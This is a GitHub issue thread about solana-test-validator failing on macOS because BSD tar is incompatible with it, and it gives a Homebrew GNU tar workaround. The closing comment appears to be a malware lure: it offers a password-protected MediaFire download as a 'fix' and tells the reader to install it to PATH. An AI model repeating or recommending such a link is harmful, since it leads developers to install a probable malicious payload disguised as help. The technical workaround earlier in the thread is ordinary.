### ISSUE TITLE
solana-test-validator fails on macOS, as hardened_unpack() expects gnu tar : ```genesis archive error```

### ISSUE THREAD

**Issue by abhijayrajvansh** [anza-xyz/agave#2810]
#### Problem
running ```solana-test-validator``` on macOS fails with following error:

```
Ledger location: test-ledger
Log: test-ledger/validator.log
Error: failed to start validator: Failed to create ledger at test-ledger: io error: Error checking to unpack genesis archive: Archive error: extra entry found: "._genesis.bin" Regular
```

#### Proposed Solution

this is because the bsd tar program is not compatible with the gnu tar program.

fix: install gnu tar program using homebrew and export it's executable path in your .zshrc file.

## mac with apple silicon
```
brew install gnu-tar
# Put this in ~/.zshrc 
export PATH="/opt/homebrew/opt/gnu-tar/libexec/gnubin:$PATH"
```

## intel-based mac
```
brew install gnu-tar
# Put this in ~/.zshrc 
export PATH="/usr/local/opt/gnu-tar/libexec/gnubin:$PATH"
```

see https://solana.stackexchange.com/questions/4499/blockstore-error-when-starting-solana-test-validator-on-macos-13-0-1/16319#16319

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx
